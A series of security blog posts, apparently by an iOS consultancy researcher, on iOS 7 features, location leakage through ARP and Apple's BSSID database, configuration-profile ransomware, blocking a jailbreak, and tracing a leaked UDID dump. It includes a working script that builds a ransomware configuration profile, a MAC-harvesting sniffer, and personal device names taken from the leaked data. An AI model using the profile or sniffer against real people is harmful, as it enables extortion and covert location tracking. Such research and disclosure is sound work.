Yesterday Apple unveiled the latest versions of OS X (code-named Mavericks) and iOS 7 at the annual Worldwide Developers Conference (WWDC). The general focus was on end-user features and items of interest to developers, but several items appeared to have an impact on security in one way or another.
The beta versions of both operating systems were also released to developers yesterday, but I haven’t seen them yet (and once I do, I’d probably be bound by NDA to not talk much about them). So before I go that route (hopefully later this week!), I thought it would be useful to quickly review some of the items I found potentially significant. I’ll briefly describe the features, then summarize some of the security questions I have at the end. Also, whenever I talk about “Early Reports,” I’m referring to information not specifically announced by Apple, but which has leaked through screenshots and other reports.
OS X “Mavericks”
Though my focus at Intrepidus has generally been on iOS, I do use OS X on a daily basis, and a few items here seemed worthy of mention (plus, they also pertain to iOS).
- Passwords in the Cloud — a secure vault, stored on iCloud, for website logins, credit card numbers, Wi-Fi passwords, etc. This was cited as using AES-256 encryption, pushed to trusted devices. When used within Safari, it can even auto-suggest random, secure passwords as you create web-based accounts.
- Notifications in the lock screen — when the computer is locked or asleep, notifications (including push notifications) can queue up, and will be displayed to the user the next time they wake up the computer, while the screen is still locked.
- The map application can send directions to an iPhone, but how this works wasn’t explained. My speculation is it’s an iCloud document, just like you can send Passbook passes from Safari directly to your iOS devices.
iOS 7
This was the big change. So big, they repeatedly referred to it as “the biggest change to iOS since the introduction of the iPhone.” Clearly, there have been big changes in the interface design, but several new features were introduced as well.
- AirDrop — iOS devices can now share information directly with nearby friends over peer-to-peer Wi-Fi. This was introduced in OS X Lion, and doesn’t require actually being on the same Wi-Fi network.
- Notification center on lock screen — similar to the new feature in Mavericks
- Control Center — provides an easy way to toggle features like Wi-Fi, Airplane mode, and Do Not Disturb, by simply swiping up from the bottom of the screen. This also allows quick access to four applications: Flashlight, Timers, Calculator, and Camera.
- Better multitasking — applications may now actually remain in the background, with the operating system using some careful monitoring and management to reduce the cycles they use to the bare minimum. This also provides a facility called “push trigger,” where an application in the background can actually immediately act on data received in a push notification.
- Safari: iCloud keychain and parental controls — I don’t have any idea what the parental controls would do, but if it provides a way to blacklist and/or whitelist websites, this could be somewhat useful in corporate settings. And, of course, the iCloud keychain (described above for Mavericks) is a major new feature.
- App store automatic updates — this is a good/bad thing, in my mind. People certainly want to stop having to do big updates of many apps every week or two…but sometimes a new version of an app may be buggy, and users might not want to upgrade immediately. Also, corporations may want to review apps before they’re updated, to ensure that new features don’t change the risk profile the app poses to their enterprise.
- Activation Lock — this new feature allows a user to configure an iOS device such that if it’s been remotely wiped (because it was lost or stolen), then the device cannot be re-activated until the original iCloud credentials are entered. This should provide some additional deterrence against theft, at least, once the feature becomes widespread and well understood.
These keynotes always focus on only a few features, and there are always several dozen other features that don’t get described in detail. In this case, two screens full of features were shown during the keynote, including several that appear to have relevance to security or corporate users:
- Enterprise single sign on — definitely interesting
- Per-app VPNs — would be very interesting if each app could be assigned to an arbitrary VPN
- Streamline MDM enrollment — no idea what this could mean, since (for the end user) it’s already pretty simple
- App store volume purchase — this has been a complicated endeavor since it was first introduced, so changes here could be significant
- Managed app configuration — this might be similar to application profiles in the OS X profile manager (which are an outgrowth of the old MCX system in pre-Lion OS X)
- Scan to acquire passbook passes — probably built-in QR scanner
- iBeacons — Low Energy Bluetooth location
- Automatic configuration — possibly the aforementioned app configuration
- Barcode scanning — may confirm the passbook assumption
- Data protection by default — finally, all apps may have the additional “encrypted when device is locked” protection
Finally, some interesting bits have already been seen in screenshots on the web:
- Integration of Vimeo and Flickr accounts for share sheets (similar to existing Twitter and Facebook integration)
- Separate iCloud security panel, including integrated two-factor authentication, a separate passcode for the iCloud keychain, and a toggle for “Keychain Recovery” subtitled “Restore passwords if you lose all your devices.”
Now, on to the security questions I promised at the start:
- How are passwords in the cloud stored, and does anyone else have access to the data (for example, if you forget your key)?
- Can we control what notifications appear on the lock screen? For example, allow Twitter, but disallow mail, while allowing both Twitter and email when the device is unlocked?
- Does AirDrop on iOS introduce any new problems? Can strangers try to push data to you while in public, even if you’re not logged into a public Wi-Fi? Could that lead to a phishing vector (for example, sharing a malicious configuration profile over AirDrop)?
- Can you change the applications available for quick-launch in the Control Center? Early reports indicate that the Control Center may be enabled for use in the lock screen, and if so, how does that affect apps which encrypt their data?
- How much can an application do when woken up by a push trigger? Could an attacker in control of a malicious app and its push server remotely enable the device microphone, for example? Can this be done while the device is locked?
- Can automatic app updates be configured, for example, to wait a week after release prior to being applied? Can the feature be disabled altogether? Or better yet, can certain apps be flagged for manual updating only?
- For activation lock, can the remote geolocation and messaging features of Find My iPhone remain intact even after the device was wiped? Currently, users are faced with a tough choice, whether to wipe the device and give up any chance of locating it again, or leave it trackable, and able to receive messages, but at risk of someone extracting sensitive information from it. It’d be nice if one could wipe the device, but still be able to try to track it down and send “If found, please call me for a reward” messages to the finder.
All in all, there appears to be a great deal of change coming in both OS X, and especially, iOS. This summer will keep us busy exploring all the new features and their security implications, and hopefully the final release will prove to be an improvement in many areas.
It’s been a while since I thought much about location-based services on iOS systems, in particular their privacy implications. Of course “Locationgate” happened back in March 2011, when researchers called public attention to a database of location points saved on iPhones. A year later, Mark Wuergler reported on a possible information leak where iOS devices disclosed the MAC addresses (more properly, BSSIDs) of the last few access points they’d linked to.
These two issues were brought together last summer, at the Black Hat Arsenal, when Hubert Seiwert (@hubert3) presented a tool called iSniff GPS. The tool was described in more detail at Syscan in Singapore just a couple of weeks ago, but finally came to my attention in a tweet Wednesday night pointing me to SC Magazine (Australia).
Intrigued, I spent some time yesterday installing the iSniff tool and putting it through its paces, and have a few thoughts I’d like to share.
The iSniff GPS tool contains two main components: a sniffer and a GUI. The sniffer watches for leaked ARP packets, identifies the BSSIDs they’re probing for, and fetches information about them from Apple. The web-based GUI (built on Django) shows you the devices that have been “noticed” on the local network, and lists the networks those devices have visited. When a probed network is matched in Apple’s database, a link will also take you to a visualization of all the data Apple has on file regarding that access point’s location.
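To make the sniffing half concrete, here’s a rough sketch in Python (using scapy) of the underlying trick. This is not iSniff’s actual code: devices implementing RFC 4436 send unicast ARP requests addressed to the MAC of a router they’ve seen before, so the destination MAC of those frames is the leaked identifier. The interface name below is an assumption.

from scapy.all import ARP, Ether, sniff

BROADCAST = "ff:ff:ff:ff:ff:ff"

def handle(pkt):
    # op 1 is an ARP "who-has" request
    if ARP in pkt and pkt[ARP].op == 1 and pkt[Ether].dst != BROADCAST:
        # A unicast ARP request: the target MAC is a router this client
        # already knows, typically from a previously-joined network.
        print(f"{pkt[Ether].src} probed for known router {pkt[Ether].dst} "
              f"(IP {pkt[ARP].pdst})")

sniff(iface="en0", filter="arp", prn=handle, store=False)  # needs root

The other half, querying Apple’s location service for each harvested MAC, is what turns that leak into an actual location.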
After installing the tool, I took an old access point, connected my laptop directly to it, and joined a few iOS devices to see what happened. The tool was definitely working as designed — devices immediately appeared in the list, along with a list of BSSIDs each client probed for. Clicking on each client in the list displays a detail screen with latitude and longitude for each network BSSID found in the Apple DB, and a link to display the information on a map. Another tab pivots the data, listing it by network (with the relevant clients next to each), while other tabs offer direct mapping of selected BSSIDs and even searching and mapping of the wigle.net SSID database.
Interestingly enough, none of the access points the devices queried were in Apple’s database. The access point at work was found in the WiGLE DB (listed both by name and BSSID), but not in the Apple DB. My home access point didn’t show up in either database, despite having several iOS devices connecting on a daily basis, not to mention multiple visiting family members most of whom have iOS devices as well. [Note: Not entirely correct, see update below.]
However, another network in the building did show up in Apple’s DB, and I was also able to accurately geolocate several access points near our sister company (iSEC Partners) in Manhattan. Perhaps there hasn’t been enough traffic by our building in the year since we moved in? We just haven’t been reported frequently enough to be included in the database?
That’d be a great theory, except that the BSSID for the access point I was testing with also appeared in the Apple DB. That seemed really odd, since this AP is almost never on, and when it is, it’s rarely for more than a few days at a stretch, and almost never accessed by anything other than my own devices. Occasionally it’ll be set up as “attwifi” for testing, and I’ll get a few people in doctors’ offices connecting (and enjoying free internet access), but that’s probably no more than a dozen devices, all told, ever. Finally, the AP gets brought to the beach every year (and lots of people use it there) but that’s obviously a totally different location, and even then, not more than a couple dozen additional devices. And again, only for a week.
So why is an access point that’s been active 24×7 for over a year not in the database, while another one, in use for maybe 3 or 4 weeks of total time over the same year (and one of those weeks in a different state), is? There’s definitely some odd criteria in play here that I haven’t yet been able to guess at.
What does all this mean? It’s clear that the Apple BSSID database has real utility: It helps devices quickly, and more accurately, determine exactly where they are. There might be a way that Apple could restrict how queries are performed on the database, but it’s possible that would be difficult to do effectively. And of course, Apple isn’t the only entity maintaining such a database. Trying to keep your AP information out of a publicly-accessible database just isn’t going to happen.
On the other hand, the leakage of the BSSID data when a device joins another network is a little harder to justify. What exactly is the utility the user gets from this? A faster recognition by the device that it’s on a network it knows? What services benefit from this, and to what degree? It may well be acting in accordance with RFC 4436, but that doesn’t necessarily make it right (and very few, if any, Android devices exhibit the same behavior).
Ultimately, the real question is whether the daily benefit to the end user outweighs the risk that the location of their home, or school, or workplace, might be disclosed to an eavesdropper at a coffee shop. Which, in a strict risk analysis, probably falls far short of requiring elimination of the leakage. Perhaps it could be mitigated with a user preference setting, but this problem is pretty esoteric even for information security researchers, and I suspect clearly describing the problem (and its implications) to the average user in the space of a few lines on a preference pane would be flat-out impossible.
At any rate, this is a very interesting demonstration of fusing publicly-accessible data from multiple sources to gain information not otherwise explicitly revealed. And that in itself definitely makes the iSniff GPS tool worth checking out.
Quick Update, 5/13/2013: I was out of town over the weekend, but now have done a little more checking, based on Hubert’s comments below and on Twitter.
Turns out, of the two networks at work (open/guest and closed/employees), one of the guest BSSIDs is in Apple’s DB, but none of the closed BSSIDs are, which still seems odd to me. Of four neighboring businesses’ BSSIDs checked, all four are in Apple’s DB. And I looked again for my home AP, and it was in there — I’d been querying the wrong MAC address.
So the Apple DB is a little more complete than I’d thought, though there’s still something keeping our main work net from showing up.
And I also verified that the ARP queries being sent out by iOS devices upon joining the network are not for our local APs, but for the router / DNS server (which are both the same here). So for places where the router / DNS is also the Wi-Fi access point (many, many places), the ARP disclosure can lead to geolocation via Apple’s DB. But where the Wi-Fi and router / DNS are split to multiple devices, it’s a bit harder to find.
A couple of months ago, at ShmooCon 2013, Tim Medin gave a great short talk titled “Apple iOS Certificate Tomfoolery.” One of the most interesting ideas I took away from this talk was the idea of ransomware delivered through a configuration profile. Briefly, configuration profiles can be used to control many aspects of an iOS device’s configuration. They can enable features, disable features, and even hide applications from the user.
This is the tricky bit: Create a configuration profile that disables Safari, disables installation of applications, even disables iCloud backups, and adds a “READ ME” web page to the user’s home screen. Put a password on the profile, so the user has to enter the password in order to remove it. Now, you just need to convince the user to install the profile, and you can do that simply through email or SMS phishing. Once they install it, half their expected functionality suddenly goes away, and if they tap on the “READ ME” page, they’ll see the instructions as to how to pay ransom to receive the password to remove the profile. Win! (well, not for the user).
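To make this concrete, here’s a hedged sketch of what such a profile might look like, built with Python’s plistlib. The payload types and key names (com.apple.applicationaccess, RemovalPassword, and so on) come from Apple’s Configuration Profile Reference; every identifier, URL, display name, and password below is invented for illustration, and a real attacker would likely also sign the profile to look more legitimate.

import plistlib, uuid

def payload(ptype, **keys):
    # Common wrapper fields every payload needs
    return {
        "PayloadType": ptype,
        "PayloadIdentifier": f"example.{ptype}",  # invented identifier
        "PayloadUUID": str(uuid.uuid4()).upper(),
        "PayloadVersion": 1,
        **keys,
    }

profile = {
    "PayloadType": "Configuration",
    "PayloadIdentifier": "example.ransom",            # invented
    "PayloadUUID": str(uuid.uuid4()).upper(),
    "PayloadVersion": 1,
    "PayloadDisplayName": "Carrier Settings Update",  # the phishing bait
    "PayloadContent": [
        # Restrictions: no Safari, no installing apps, no iCloud backup
        payload("com.apple.applicationaccess",
                allowSafari=False,
                allowAppInstallation=False,
                allowCloudBackup=False),
        # The removal password -- note that it sits here in plaintext
        payload("com.apple.profileRemovalPassword",
                RemovalPassword="ostrich"),
        # The "READ ME" web clip on the home screen
        payload("com.apple.webClip.managed",
                URL="http://example.com/readme",
                Label="READ ME",
                IsRemovable=False),
    ],
}

with open("ransom.mobileconfig", "wb") as f:
    plistlib.dump(profile, f)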
Now, fortunately, there are a couple of flags that (might) alert the user that something odd is happening. First, in the initial profile installation screen, is the list of contents, which includes “Profile Removal Password.” Similarly, tapping on “More Details” clarifies that this is a locked profile. Of course, if the email introducing the profile was written well enough, then the user might already expect and accept this. Hopefully we can train them not to. Also, if the user has a passcode on their device, then they have to enter their passcode as well, so it won’t simply install without the user noticing.
But what if they ignore all the warnings, and install the profile anyway? Well, all might not yet be lost. Turns out, the removal password is included in the profile, in plaintext. The attacker could choose to encrypt the profile, but to do that they need a public key from the target device, which might not be so easily acquired. So, assuming the profile is not encrypted, just pull down the .mobileconfig file from the original phishing email, open it up, and find the password.
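As a sketch of that recovery step (the filename and regex are mine, not a canonical parser): since signed profiles are CMS-wrapped, a blunt byte search for the key is often easier than real plist parsing, and works on any unencrypted profile.

import re

data = open("ransom.mobileconfig", "rb").read()
m = re.search(rb"<key>RemovalPassword</key>\s*<string>([^<]+)</string>", data)
print(m.group(1).decode() if m else "no plaintext password found")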
Of course, the attacker could get really tricky, and serve up a file with a different password each time, placing some kind of key into the ransom notice (“Pay me $35 to remove this profile. Use the word ‘ostrich’ when you send me your bitcoins”) and then that key would be used to derive the actual removal password. If this is the case, then each time you hit the page you’d get something different, and so you wouldn’t be able to recover the correct password. In that case, the only real way to remove it is either to pay the ransom, or, if the device is jailbroken, get in and remove the profile directly from the filesystem.
In iOS 6.x, a new feature was introduced that can prevent the user from installing profiles. This feature is only available in Supervised Mode (via the Configurator application), however, and so isn’t of much use to the general population.
It’s almost time for another ShmooCon, and as usual, we’ll be out in force for the conference. We won’t have a booth this year, but we will be milling about, attending talks, and even giving a couple presentations of our own. We might even have a little puzzle to share…just ask any one of us for details. (David might have a slightly more visible puzzle contest as well, but, well, there were secrecy oaths, threats of retribution, etc., so the less said about that, the better).
Be sure to check out our talks, too. Roman Faynberg will be presenting Armor For Your Android Apps, Saturday at 3:00, a discussion of Android vulnerabilities, with plenty of real-life examples and hair-raising war stories, as well as tips and best practices to avoid such problems in development. There’s even a HackMe-type app to help demonstrate some of the problems.
At exactly the same time (sorry, we couldn’t control it!), David Schuetz will be presenting on Protecting Sensitive Data on iOS Devices. His talk will try to cut through some of the technical mumbo-jumbo and present best practices for configuration, management, and application development on iPads and iPhones, with a goal of making it easy to explain to management-types.
We’re also hiring! Current openings for [testers | consultants | ninjas | pirates] (sorry, no open positions for samurai or lumberjacks). If you’re interested, chat with one of us at the con, or send us an email at email@example.com.
So if you’re going to be at ShmooCon, stop us in the halls and have a chat. We can’t wait to see you!
The latest iOS jailbreak was released yesterday. Called “evasi0n,” it can be used to bypass most all protections in iOS 6.1 on any device that supports it. It’s quite cool, and was certainly something I was looking forward to (since much of my work is greatly aided by working on a jailbroken device).
However, another part of my work is ensuring that our customers’ devices are as secure as they can be. And having an available jailbreak kind of weakens those assurances. So it might be useful to find a way to prevent the jailbreak from working.
And, it turns out, there might be such a way. At least, until the jailbreak team finds a workaround for the workaround.
Last March, Apple released the Configurator application. Using this application, iOS devices can be put into a “Supervised” mode, which strongly locks down many features. One of the features it controls is the ability to connect to iTunes and do backups/restores. On a supervised device, this functionality is possible only from the machine designated as the device’s supervisor.
The evasi0n jailbreak just happens to depend on the iOS backup / restore channel. So much so, in fact, that the jailbreak failed outright when I tried it on a supervised device.
Could the evasi0n authors work around this? Possibly. It depends on how deep the supervised mode controls are embedded within iOS. If the device requires a unique host key (from the supervising machine) in order to restore data to the iPad, then it could well be impossible to make evasi0n work on anything other than the actual supervising host.
Of course, putting a device in supervised mode isn’t for the faint of heart — it’s a major shift in how one configures and manages iOS devices. So this probably won’t be a “Jailbreak Stopper” for every major organization out there with large pools of iPads. But it might provide some additional comfort in small groups, like iPads checked out to executives, etc.
But couldn’t a user just remove the device from supervision? Yes, but that’s harder than it sounds. “Erase all Settings” won’t do it, and even “Erase all content and settings” (essentially, “wipe the device with extreme prejudice”) won’t kill the supervisory link. To make a device unsupervised, you need to connect it back to the supervising machine, and sever the link within Configurator. You should also be able to do it in iTunes by doing a full OS restore. In either case, however, all data on the device is wiped, so anything installed while in supervised mode would be lost prior to the jailbreak.
Bottom line: if your organization has iOS devices with sensitive information, and you’re concerned that this jailbreak might put data at risk, it might be worth checking out Configurator and putting some of your devices under supervised control.
[shameless plug: I'll be talking a little about this, and other ways to protect your data on iOS, at ShmooCon.]
UPDATE: Further thought should’ve made it obvious to me that forcing encrypted backups would have the same effect, and this is borne out in some simple testing. Of course, the user can’t be permitted to remove the encryption: so it needs to be forced through a configuration profile, preferably one that can’t be removed. If this setting is implemented through Mobile Device Management, then the user could remove the device from MDM, disable encryption, jailbreak the device, and then re-enroll in MDM. So not entirely foolproof, but perhaps a more practical approach than shifting everyone to supervised mode.
I’d heard about the alleged FBI/Apple UDID leak shortly after arriving at work last Tuesday morning, and immediately downloaded and began reviewing the data. Less than an hour later, I’d surmised that comparing apps across multiple devices might help narrow down the source.
Several hours later, at 3:00, I saw a tweet from @Jack_Daniel suggesting that people checking their UDIDs in online forms enter only partial numbers. And that made me wonder: “What’s the minimum number of digits people need to enter in order to be guaranteed a unique result?” Sort to the rescue:
cat data | cut -c 2-7 | sort | uniq -c | more
This gave me a bunch of repeats. That’s not too surprising, as I’m only looking at 6 digits. Next up was 8 digits, and still I saw hundreds of repeats. Then I changed tactics and simply counted the number of unique UDIDs…and I came up with a number significantly different from the 1,000,001 that were released: 985,117. So there are almost 15,000 duplicates. Looking further, I saw that many of these duplicates have different device tokens, prompting a tweet, about 3:15:
Interesting. Just noticed there are UDID duplicates in that data dump, with multiple APNS tokens. Different app providers, or multiple regs?
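(For the curious, here’s roughly how I’d answer that minimum-digits question programmatically. A Python sketch, assuming each line starts with a quote character followed by the 40-character UDID, which is what the cut commands above imply about the file’s layout:)

from collections import Counter

# De-duplicate first; the dump contains repeated UDIDs
udids = {line[1:41] for line in open("data")}

for n in range(4, 41):
    # Stop at the shortest prefix length with no collisions
    if max(Counter(u[:n] for u in udids).values()) == 1:
        print(f"{n} hex digits are enough to guarantee a unique match")
        break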
About 45 minutes later, on my way home, @danimal suggested: “@DarthNull multiple apps? Seems like maybe a game or ad company.” I immediately thought, damn, that must be it. At 4:23 pm, I replied “Yes! makes sense.”
And two minutes after that, I found what seemed to be the source of the breach.
I had decided to look more closely at the most frequently repeated device IDs, on the theory that perhaps that would belong to a developer. They’d naturally test multiple apps for their company, each of which should have a different device token. So first, more shell magic:
cat data | cut -c 2-10 | sort | uniq -c | sort -n -r | head
Wow, some are repeated 10 or even 11 times!
     11 4daa64abd
     10 d1f575954
     10 aa5c7aedb
      8 12e6ec97e
      7 f661c1396
      7 4225e2a59
      6 91a83b0e3
      6 480074431
I searched for the first one, and found 11 different entries for a “Gary Miller.” Nothing much there. The next one, though, had some interesting device names:
'Bluetoad Support'
'Bluetoad Support'
'BT iPad WiFi'
'BT iPad WiFi'
'CSR iPad'
'Customer Service iPad'
'Developer iPad'
'Developer iPad'
'Hutch Hicken’s iPad'
'Hutch Hicken’s iPad'
Six different names, four repeated twice (implying at least a pair of apps and several users). Then I looked at the next entry, with 10 repeats: it’s variously named Robert, Red, and HP Pavilion. Meh. The entry with 8 repeats: GoldPad. But the entry with 7 repeats really grabbed my attention:
'Bluetoad iPad'
'Bluetoad iPad'
'Client iPad BT'
'Client iPad BT'
'CSR/Marketing iPad'
'CSR/Marketing iPad'
'Jessica Aslanian’s iPad'
Support? Customer service? Developer? Marketing? A quick Google search revealed that, yes, BlueToad does develop iOS apps. In fact, they build magazine apps for many different publishers, and a quick trip through the iTunes store showed me that these applications use Push Notifications.
As this was the kids’ first day of school, we went out for a nice dinner to celebrate. While there, I thought more about what I’d found, and decided to roll the dice: I sent an email to BlueToad, using the email address on their website. I didn’t say much, just that there’d been a breach involving UDIDs and push tokens, and that I’d found some interesting data suggesting they may be involved. After returning home, I spent another four hours digging for more.
By the time I went to bed, I had identified nineteen different devices, each tied to BlueToad in some way. One, appearing four times, was twice named “Hutch” (their CIO), and twice named “Paul’s gift to Brad” (Paul being the first name of the CEO, and Brad being their Chief Creative Officer). I found iPhones and iPads belonging to their CEO, CIO, CCO, a customer service rep, the Director of Digital Services, the lead System Admin, and a Senior Developer.
This felt really significant. But as I started writing up my notes, doubt crept in. What were some other explanations? Perhaps everyone at the company used a common suite of applications. Like the same timesheet app, for example. Then of course they’d all appear in the data. But even still, I couldn’t shake the feeling that I was onto something.
I spent much of the next day writing a detailed analysis of the situation for our blog. Then, about 4:30, I drafted a follow-up message to BlueToad about what I’d found, how I’d found it, and what I thought it meant. I also mentioned that though I was reluctant to publicly name them without more solid data, it seemed likely that others would also find their name in the dump.
Since I now had several more employees’ names, I spent some time looking for email addresses, to (hopefully) increase the chance of a response. While searching, I stumbled on a partial password dump for the company! And it was dated March 14, the same week that the hackers claimed they’d hacked into the FBI computer. Suddenly, I felt a lot more confident again, and I mentioned this connection in the email.
Shortly after 8:00 that evening, I heard from Hutch Hicken, their CIO. He thanked me for what I’d done, and for my discretion in contacting them first rather than simply going public. He told me that they were assessing the situation, but didn’t yet know anything for certain. He didn’t think the March leak (which they’d already been aware of) was related, but the rest of my findings were concerning. He said they planned to “do this right,” and he promised to keep me in the loop (as much as is feasible for a non-employee).
Most of the next day (Thursday), I didn’t really hear much. Then about 2:30 on Friday, Hutch called me again. Almost immediately, he told me that we could talk, but only if I agreed to embargo the story until noon on Monday. My response was “Well, the fact that you’re asking me this tells me that I’ll want to say yes,” so naturally I agreed.
He told me that they were confident the leak came from them, and he filled me in on some of the technical details (I’ll leave those details to others, to make sure I don’t make any mistakes). They’re almost certain of their involvement, and are continuing to handle the situation.
Then he hit me with a big surprise: Kerry Sanders, a correspondent for NBC Nightly News in Miami, wanted to interview me. On camera. He was in the next room, and the phone got passed to the reporter, and the next thing I knew, we were arranging an interview for that night. He didn’t arrive at my house until 11:00 (his plane was delayed), and we spent 45 minutes talking about what I found, how I found it, the privacy implications of the breach, and other related topics.
By the time he left at midnight, I was exhausted. As I write this, I still don’t know how much of the interview he’s going to use, or even if it’s going to make it onto the air Monday night. Either way, it was certainly a surreal way to conclude what started out largely as another puzzle hunt.
I’m still not completely clear on all the technical details. Was BlueToad really the source of the breach? How did the data get to the FBI (if it really did at all)? Or is it possible this is just a secondary breach, not even related to the UDID leak, and it was just a coincidence that I noticed? Finally, why haven’t I noticed any of their applications in the (very few) lists of apps I’ve received?
Hopefully, I’ll learn the answers to many of these questions in the coming days. Either way, I’m glad to have been able to help, and offer my thanks to BlueToad for their cooperation, and their quick response.
UPDATE: Here’s the link for the NBC Nightly News post.
UPDATE: Timo Hetzel kindly corrected a misunderstanding that I had regarding how device tokens are created. I had believed that each application on a device had a different token, but that was in error — it’s a single device token for all apps on a device. So whenever I saw many tokens for a given device, that represented (in most cases) multiple refreshes of the same device. However, apps using the development “sandbox” Push Server receive a different token than what apps using the main production server receive, so seeing multiple devices from BlueToad, each with exactly two tokens for a given device name, further implicates the use of those devices by developers.
Early Tuesday, a file was released detailing the compromise of 1,000,001 records, supposedly from an FBI laptop. Reportedly, these represented only a small portion of a much larger breach — over 12 million records. It’s further claimed that the full breach includes personal information such as mailing addresses and telephone numbers, while the published data was limited to only a few specific fields.
That’s what we’ve been told. But what do we actually know?
We know that there are, indeed, 1,000,001 records. We know that they contain unique device IDs (UDIDs) for iPhones, iPads, and iPod touches. We believe that they also contain valid device tokens (devtokens) for the Apple Push Notification Service (APNS). And that’s about it.
But that hasn’t stopped the Twitterverse from becoming all, ahem, a-twitter, about this breach. Some selected headlines and tweets:
- “The FBI and Apple have some serious explaining to do.”
- “The American people have a right to know how + why the @FBI got 12 million Apple devices users’ private info.”
- “Hackers reveal how FBI used Apple UDID’s to track 12 mn users”
But, amid the noise, some legitimate questions have been raised:
- “What can malware hacker do with UDID? Any attacks yet using UDID?”
- “Wouldn’t having a device UDID + APNS token make it easier to silently ‘push’ malware/spyware to a phone?”
Let’s talk about some of these.
First, could the FBI have built this database? They couldn’t easily build it by eavesdropping: That much data simply isn’t passed in a conveniently concise fashion. It’d take a lot of work to pull together, and it’d be highly unlikely to end up on some agent’s laptop.
Could they have received it from Apple? While Apple would need a list of devtokens to route push messages to end users’ devices, that list could be built on-the-fly as devices come online and connect to Apple. It probably wouldn’t need UDIDs, and certainly wouldn’t need all the other personal information allegedly contained in the breach. [Update: A statement from Apple says, in part, "The FBI has not requested this information from Apple, nor have we provided it to the FBI or any organization."]
So where could this data have come from? The logical answer is a 3rd party application server. For example, a cable TV carrier might have an iPhone app for their customers to view and pay bills. The back-end account database would then need mailing addresses and probably phone numbers. If they also push messages to customers’ devices (for example, to alert of an outage) then they’d need devtokens. A compromise of that kind of application (from a utility, bank, social media company, game company, publishing company, etc.) is a very plausible source of this leak.
What about the tracking question? Couldn’t this information be used to track people? Tracking generally implies a time-based log of what people are doing, where they’ve been. And even from what the hackers have said, this database contains nothing of the sort. It’s simply a static association between a device, an APNS devtoken, and a mailing address (and similar information).
Okay, so the FBI is definitely NOT using this to track people. (Also, the FBI has officially denied it came from them.) But the UDID is, you know, ZOMG bad, right?
Right. Sort of. The UDID itself isn’t so bad, and is used internally by a bunch of Apple services (including the app store and Mobile Device Management). What makes it problematic is when other services use it to track user activity. For example, a game application might tell a 3rd party service whenever you start a level, when you finish it, how long you spent playing it, and whether you won. The big risk comes when this tracking information can be correlated across many applications, and many external services. Then it’s a huge privacy issue. For example, instead of a game, think of a newspaper app, and a 3rd party knowing which articles you read, and how long you spent on each one. And possibly sharing that information with other users of their system (that is, other application vendors).
This is why Apple has been working for over a year to get developers to stop using UDIDs altogether.
So what about the last questions? Can this be used to push malware to a phone, or do something else bad?
Not really. Push messages are short (under 256 bytes), and generally are just simple messages like “You have mail” or “It’s going to rain.” Mobile Device Management (MDM) servers can push out a message that says “Come to me for instructions,” and those instructions might be “Here, install this app,” but the device first has to be enrolled in MDM, and then the hacker has to forge the MDM message (and intercept the client’s response to then impersonate the server). Plus, even if this leaked database were from an MDM server, it still wouldn’t have enough information to forge an MDM message.
It could, in theory, be used to forge a message from whatever application was the source of the leak. But even that is exceptionally difficult. For one, you’d need the certificate used by the application’s push server (which might be in the hands of the original attacker, but certainly shouldn’t be available to anyone else who’s seen the UDID list). Plus, APNS uses fairly strong bi-directional certificate checks, so just impersonating the Apple APNS server is pretty difficult.
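For reference, here’s a sketch of what a provider has to do to send a push over APNS’s binary interface (gateway.push.apple.com:2195). The interesting line is load_cert_chain: without the app’s actual push certificate and key, Apple simply drops the connection. The token and file paths below are placeholders.

import json, socket, ssl, struct
from binascii import unhexlify

token = unhexlify("ab" * 32)                 # 32-byte device token (fake)
payload = json.dumps({"aps": {"alert": "You have mail"}}).encode()
assert len(payload) <= 256                   # APNS payload size limit

# Simple notification: command byte, token length, token, payload length, payload
frame = struct.pack("!BH32sH", 0, 32, token, len(payload)) + payload

ctx = ssl.create_default_context()
ctx.load_cert_chain("push_cert.pem", "push_key.pem")   # the app's real credentials

with socket.create_connection(("gateway.push.apple.com", 2195)) as sock:
    with ctx.wrap_socket(sock, server_hostname="gateway.push.apple.com") as tls:
        tls.sendall(frame)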
Too Long; Didn’t Read summary: After all that, what’s the bottom line?
- This probably came from a 3rd party application vendor.
- It probably didn’t come from an FBI laptop, unless (perhaps) it was there as part of an investigation into a breach at the aforementioned vendor.
- There’s not much an attacker can do with this information directly, that is, targeting the users’ devices.
- However, wherever UDIDs were improperly used by a 3rd party application, it’s possible that personal information disclosures, privacy problems, or account breaches may result from those uses.
What can you do about this? Really, not much at all. Complain to companies which use UDIDs unsafely (if you’re even fortunate enough to know about it to begin with). But, as Aldo Cortesi has said, that’s a tough hill to climb. And as applications that require iOS 6 begin to filter out, be sure to upgrade them, and hopefully that’ll slowly but surely kill the 3rd party use of UDIDs.
Also, hopefully the vendor who was the original source of this leak has realized what’s happened, and taken appropriate corrective actions (replacing their push certificates, etc.).
Finally, if you have a device that’s on this breached list, please contact me at david.schuetz at intrepidusgroup dot com. It’s possible that we can narrow down which application was the source for the devtokens and, thus, the leak. I thought I’d managed to figure this out last night, but eventually decided I simply didn’t have enough solid information. Knowing clearly what the source of the leak is will give users the strongest ability to protect themselves against its effects.
Last year, I had a great time trying to solve the Fidelis Security Systems’ Decode This! puzzle at Black Hat. But I wasn’t fast enough to win. This year, I resolved to not make the same mistakes. And in the end, it paid off!
Much like last year’s puzzle, this one involved a block of Unicode text (filled with all kinds of unpronounceable glyphs), and several hints posted on Twitter. I played with the puzzle off and on before I left for the con, but didn’t really attack it full-bore until I got onto the plane for Vegas.
Near the end of my five hour flight, I had the breakthrough that I should have had three weeks prior, and knew that I was almost done. But just then, they announced that we were beginning our descent and I had to put away my laptop.
Shortly after landing, a new hint was posted, which I immediately recognized as giving me the key. I found a table in the terminal, sat down, and completed the puzzle.
A few Twitter messages back-and-forth with the puzzle creator, and we’d decided that not only did I have it right (or close enough — I was having issues with the last character), but that if I could be the first one to the booth with the answer, I’d win. So we rushed over, grabbed an expo pass from our friends at PhishMe, and ran over to the FidSecSys booth. Next thing I know, I’m posing with a giant novelty check for $1000!
You can read the complete story of how the puzzle worked, and some of the silly mistakes I’d made along the way, on my personal blog.
In late May, Apple quietly published a document entitled, simply, iOS Security. This short whitepaper describes several aspects of security within their iPad, iPhone, and iPod touch ecosystem, providing a high-level introduction to certain features and some fairly deep technical information for others. The stated goal is to help security-minded customers to better understand the core security features present in iOS. It’s definitely worth a read, but for now, let’s talk about some of the more interesting highlights.
It starts off describing the overall system architecture, from the boot ROM (including a public key used to validate system software) through the Low Level Bootloader and into the kernel and application layers. Executable code at all layers, including OS, Apple, and third-party applications, is signed, and the signatures are validated before the code is run. These checks help to keep malicious code from affecting the system.
